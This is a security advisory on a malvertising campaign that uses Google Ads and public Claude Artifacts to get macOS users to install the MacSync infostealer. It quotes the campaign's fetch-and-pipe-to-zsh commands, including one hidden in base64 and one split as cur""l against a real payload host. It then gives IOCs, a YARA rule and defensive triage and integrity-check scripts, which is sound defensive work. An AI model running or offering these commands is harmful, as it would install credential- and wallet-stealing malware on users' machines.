Malicious Campaign Uses Claude AI Artifacts and Google Ads to Deliver MacSync Infostealer
A sophisticated malvertising campaign abuses Google Ads and public Claude AI Artifacts to trick macOS users into executing terminal commands that install the MacSync infostealer, targeting credentials and hardware crypto wallets.
A newly discovered malvertising campaign is leveraging Google Ads and public Claude AI Artifacts to distribute the MacSync infostealer to macOS users. Hosting the lure on claude.ai, medium.com and similar well-known domains means the "paste this into Terminal" instruction arrives from a source that both the victim and URL-reputation filters already trust.
Attack Chain
The attack follows a multi-stage delivery workflow:
- Google Ads Lure - Attackers purchase sponsored search results for common queries like "Homebrew install," "DNS resolver," or "macOS disk analyzer"
- Trusted Domain Redirect - Ads direct victims to public Claude Artifacts or Medium/Evernote pages titled "macOS Secure Command Execution" or similar
- ClickFix Social Engineering - The page provides a convincing technical guide instructing users to paste a command into Terminal
- Payload Execution - The command downloads and executes the MacSync infostealer
Technical Details
The campaign uses two primary command variants to deliver the payload:
Variant 1: Base64 Encoded Stager
The first variant pipes a base64 blob through `base64 -D` (the macOS spelling of the decode flag; coreutils uses `-d`) into zsh. The visible prefix of the blob decodes to `curl -k -s --Max-Time 30 -H "Api-Key: ..."`, i.e. the stager fetches the remote AppleScript core with certificate checking disabled (`-k`) and with an `Api-Key` header that lets the server hand the payload only to requests that arrived through the lure:

```sh
echo "Y3VybCAtayAtcyAtLU1heC1UaW1lIDMwIC1IICJBcGktS2V5OiA1MTkwZWYxNzMzMT..." | base64 -D | zsh
```
Variant 2: Obfuscated Curl
The second variant splits the word `curl` with an empty quoted string, `cur""l`. The shell concatenates the fragments back into `curl` before execution, but a YARA rule or content filter looking for the literal string `curl` never sees it. The flags matter too: `-k` again disables certificate verification, `-f` makes curl exit quietly on an HTTP error instead of printing anything in the Terminal, and `-L` follows redirects, so a dead or moved payload fails silently rather than alarming the victim:

```sh
true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[token]" | zsh
```
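Both variants have the same shape, fetch a stager and pipe it into a shell, hidden behind either an inline base64 layer or a split keyword. The Python triage script below is an added example written for this article, not tooling from the report or from the campaign: it undoes the quote-splitting, backslash and `${IFS}` tricks the way the shell does, decodes an inline base64 stager (tolerating a truncated tail, as in the redacted sample above), and then applies fetch-and-execute heuristics to both the outer command and the decoded layer. The sample commands and the `payload.invalid` host are constructed.

```python
"""ClickFix command triage: normalize shell obfuscation, then look for the
fetch-and-execute shape behind both MacSync delivery variants.

Added example for this report, not code from the campaign or any vendor.
Sample commands below are constructed; they only imitate the command shape
(base64 -D | zsh, and cur""l string splitting)."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# --- normalization: undo word-splitting tricks zsh/bash resolve before exec ---
_EMPTY_QUOTES = re.compile(r'""|\'\'')                        # cur""l       -> curl
_QUOTED_FRAGMENT = re.compile(r'"([^"\s]*)"|\'([^\'\s]*)\'')  # c"ur"l       -> curl
_ESCAPED_CHAR = re.compile(r'\\([A-Za-z0-9])')                # cu\rl        -> curl
_IFS = re.compile(r'\$\{?IFS\}?')                             # curl${IFS}-s -> curl -s

# Only these forms count as obfuscation; an ordinary quoted argument does not.
_SPLIT_TRICK = re.compile(
    r'(?<=\w)"[^"\s]*"|"[^"\s]*"(?=\w)|(?<=\w)\'[^\'\s]*\'|\'[^\'\s]*\'(?=\w)'
    r'|\\[A-Za-z0-9]|\$\{?IFS\}?'
)

def normalize(cmd: str) -> str:
    """Return the command as the shell sees its words after quote removal."""
    cmd = _EMPTY_QUOTES.sub("", cmd)
    cmd = _QUOTED_FRAGMENT.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), cmd)
    cmd = _ESCAPED_CHAR.sub(r"\1", cmd)
    cmd = _IFS.sub(" ", cmd)
    return re.sub(r"\s+", " ", cmd).strip()

# --- signatures applied to the normalized command ---
_DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
_PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:zsh|bash|sh|osascript)\b")
_B64_DECODE = re.compile(r"\|\s*base64\s+(?:-D|-d|--decode)\b")  # macOS -D, coreutils -d
_B64_LITERAL = re.compile(r"echo\s+(?:-n\s+)?([A-Za-z0-9+/=]{16,})")

def decode_stager(blob: str) -> Optional[str]:
    """Best-effort decode of an inline base64 stager. A truncated tail (log line
    cut-off, redacted report sample) still yields the leading command."""
    blob = blob[: len(blob) // 4 * 4]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def analyze(cmd: str, depth: int = 0) -> Dict[str, object]:
    """Classify one command line as allow / review / block, with the reasons."""
    norm = normalize(cmd)
    findings: List[str] = []
    if _SPLIT_TRICK.search(cmd):
        findings.append("obfuscation: keyword split by quotes/escapes/IFS")
    if _DOWNLOADER.search(norm):
        findings.append("downloader: curl/wget")
    if _PIPE_TO_SHELL.search(norm):
        findings.append("exec: output piped into a shell")
    if _B64_DECODE.search(norm):
        findings.append("staging: inline base64 decode")
        m = _B64_LITERAL.search(norm)
        inner = decode_stager(m.group(1)) if m else None
        if inner and depth < 2:  # follow one layer of nesting, not unbounded
            findings.extend("decoded stager -> " + f for f in analyze(inner, depth + 1)["findings"])
    has_exec = any("exec:" in f for f in findings)
    has_fetch = any("downloader:" in f or "staging:" in f for f in findings)
    verdict = "block" if has_exec and has_fetch else ("review" if findings else "allow")
    return {"normalized": norm, "findings": findings, "verdict": verdict}

# Constructed samples shaped like the two variants, plus two controls.
STAGER_B64 = base64.b64encode(b"curl -k -s --max-time 30 https://payload.invalid/stage | zsh").decode()
SAMPLE_COMMANDS = [
    f'echo "{STAGER_B64}" | base64 -D | zsh',                                       # variant 1 shape
    'true && cur""l -SsLfk --compressed "https://payload.invalid/curl/abc" | zsh',  # variant 2 shape
    'curl -fsSL https://example.invalid/readme.txt -o readme.txt',                  # download only
    'brew install jq',                                                               # benign
]

if __name__ == "__main__":
    for c in SAMPLE_COMMANDS:
        r = analyze(c)
        print(f"{r['verdict']:6} {r['normalized'][:70]}")
        for f in r["findings"]:
            print("        ", f)
```

The split-keyword check runs on the raw command while the fetch/exec checks run on the normalized one, so a plain quoted URL is not reported as obfuscation but `cur""l`, `cu\rl` and `curl${IFS}` are. The same normalization belongs in front of any EDR or YARA logic that matches on command-line strings.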
Crypto Wallet Targeting
If MacSync finds the Ledger or Trezor desktop apps, it replaces the bundle's internal app.asar (the Electron archive that holds the app's JavaScript) with a trojanized copy that phishes for the seed phrase. Swapping a file inside the bundle invalidates the vendor's code signature, so the malware re-signs the bundle ad hoc; the modified app then launches and passes basic Gatekeeper checks, but `codesign -dvvv` on it shows `Signature=adhoc` and no Developer ID `Authority=` chain, which is the tell to look for.
Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| C2 Domain | a2abotnet[.]com | Primary C2 and exfiltration gate |
| Payload Host | raxelpak[.]com | Hosts malicious loaders |
| Payload Host | jmpbowl[.]xyz | AppleScript payload hosting |
| Staging Path | /tmp/osalogging.zip | Stolen data staging archive |
| SHA-256 | ec6bc84be18ce4cb55fb915370c00f2a836ffefc65c6b728efb8d2d28036e376 | Trojanized Ledger app.asar |
| SHA-256 | c99dea85f0ef8d3e2f3771c8ebd02d7dee0d90efc5c8392e5c266a59640a4206 | Modified Info.plist |
YARA Detection Rule
```yara
rule MacSync_Detection {
    meta:
        description = "Detects MacSync infostealer and staging artifacts"
        author = "Security Research"
        date = "2026-02-14"
    strings:
        // staging archive and C2 from the IOC table
        $s1 = "osalogging.zip" ascii
        $s2 = "a2abotnet.com" ascii
        // short internal identifiers, hence the "2 of" requirement below
        $s3 = "GrabFolderLimit" ascii
        $s4 = "checkvalid" ascii
        // password-prompt lure shown by the stealer
        $phish = "Enter your system password to continue verification" ascii
    condition:
        2 of ($s*) or $phish
}
```
Mitigation
- Never paste terminal commands from public AI artifacts, Medium posts, or sponsored search results; a legitimate install guide does not need `base64 -D | zsh` or a quoted-and-split `cur""l`
- Block a2abotnet[.]com, raxelpak[.]com, and jmpbowl[.]xyz at the network level (DNS and proxy), and alert on any hit, since a hit means a command has already been run
- Monitor process telemetry for Terminal spawning `osascript`, or `curl` / `base64` output piped into `zsh`, `sh`, or `bash`
- Verify the integrity of the hardware wallet apps (Ledger, Trezor) if a suspicious command was executed: hash Contents/Resources/app.asar and Contents/Info.plist against the IOC table and check the code signature with `codesign -dvvv`, treating `Signature=adhoc` as tampering; if a seed phrase was entered into a tampered app, treat the wallet as compromised and move the funds to a new seed
- Note that Anthropic and Google may take 12-24 hours to remediate reported malicious links, so do not rely on takedown as the control
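The wallet integrity check from the crypto wallet section and the mitigation list above, as an added example (not code from the report, Ledger, or Trezor): it hashes the bundle's app.asar and Info.plist against the IOC table and parses `codesign -dvvv` output for the ad-hoc signature a re-signed bundle carries. The install paths under /Applications are assumptions, the relative file paths are the standard Electron bundle layout, and the codesign output excerpts are constructed rather than captured; run it on the affected Mac to check real bundles.

```python
"""Integrity check for Electron wallet apps after a suspected MacSync run.

Added example, not code from the report, Ledger or Trezor. Hashes the
bundle's app.asar / Info.plist against the IOC table and flags an ad-hoc
code signature. Bundle paths and codesign excerpts are assumptions."""
import hashlib
import os
import re
import subprocess
from typing import Dict, List

# SHA-256 values from the report's IOC table.
KNOWN_BAD_SHA256 = {
    "ec6bc84be18ce4cb55fb915370c00f2a836ffefc65c6b728efb8d2d28036e376": "trojanized Ledger app.asar",
    "c99dea85f0ef8d3e2f3771c8ebd02d7dee0d90efc5c8392e5c266a59640a4206": "modified Info.plist",
}
# Assumed default install paths; the relative paths are the standard Electron layout.
WALLET_BUNDLES = ["/Applications/Ledger Live.app", "/Applications/Trezor Suite.app"]
CHECKED_FILES = ("Contents/Resources/app.asar", "Contents/Info.plist")
STAGING_ARCHIVE = "/tmp/osalogging.zip"  # stolen-data staging path from the IOC table

# Constructed `codesign -dvvv` excerpts, not captured from a real host.
CODESIGN_ADHOC = (
    "Executable=/Applications/Example Wallet.app/Contents/MacOS/Example Wallet\n"
    "Identifier=com.example.wallet\n"
    "Format=app bundle with Mach-O universal (x86_64 arm64)\n"
    "Signature=adhoc\n"
    "Info.plist entries=30\n"
)
CODESIGN_VENDOR = (
    "Executable=/Applications/Example Wallet.app/Contents/MacOS/Example Wallet\n"
    "Identifier=com.example.wallet\n"
    "Signature size=9010\n"
    "Authority=Developer ID Application: Example Vendor (TEAMID00000)\n"
    "Authority=Developer ID Certification Authority\n"
    "Authority=Apple Root CA\n"
)

def sha256_file(path: str) -> str:
    """Streamed SHA-256 so a large app.asar does not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def signature_findings(codesign_output: str) -> List[str]:
    """An ad-hoc signature prints 'Signature=adhoc' and has no Authority= chain;
    a vendor-signed bundle lists Developer ID authorities instead."""
    found = []
    if re.search(r"^Signature=adhoc$", codesign_output, re.M):
        found.append("ad-hoc code signature: bundle re-signed without a developer identity")
    elif not re.search(r"^Authority=", codesign_output, re.M):
        found.append("no Authority= chain in code signature")
    return found

def run_codesign(bundle: str) -> str:
    """Live wrapper, macOS only. codesign prints signature details on stderr."""
    p = subprocess.run(["codesign", "-dvvv", bundle], capture_output=True, text=True)
    return p.stdout + p.stderr

def check_bundle(bundle: str, codesign_output: str,
                 bad_hashes: Dict[str, str] = KNOWN_BAD_SHA256) -> Dict[str, object]:
    """Return IOC and signature findings for one app bundle (empty list = clean)."""
    findings: List[str] = []
    for rel in CHECKED_FILES:
        path = os.path.join(bundle, rel)
        if not os.path.isfile(path):
            findings.append(f"missing: {rel}")
            continue
        digest = sha256_file(path)
        if digest in bad_hashes:
            findings.append(f"IOC match: {rel} is {bad_hashes[digest]} ({digest})")
    findings.extend(signature_findings(codesign_output))
    return {"bundle": bundle, "findings": findings}

if __name__ == "__main__":
    if os.path.exists(STAGING_ARCHIVE):
        print(f"staging artifact present: {STAGING_ARCHIVE}")
    for b in WALLET_BUNDLES:
        if os.path.isdir(b):
            r = check_bundle(b, run_codesign(b))
            print(b, "CLEAN" if not r["findings"] else "\n  " + "\n  ".join(r["findings"]))
```

A clean hash only proves the file is not one of the two published samples, so the signature check carries the weight: a vendor app that now reports `Signature=adhoc` has been re-signed by someone other than the vendor, whatever its hash.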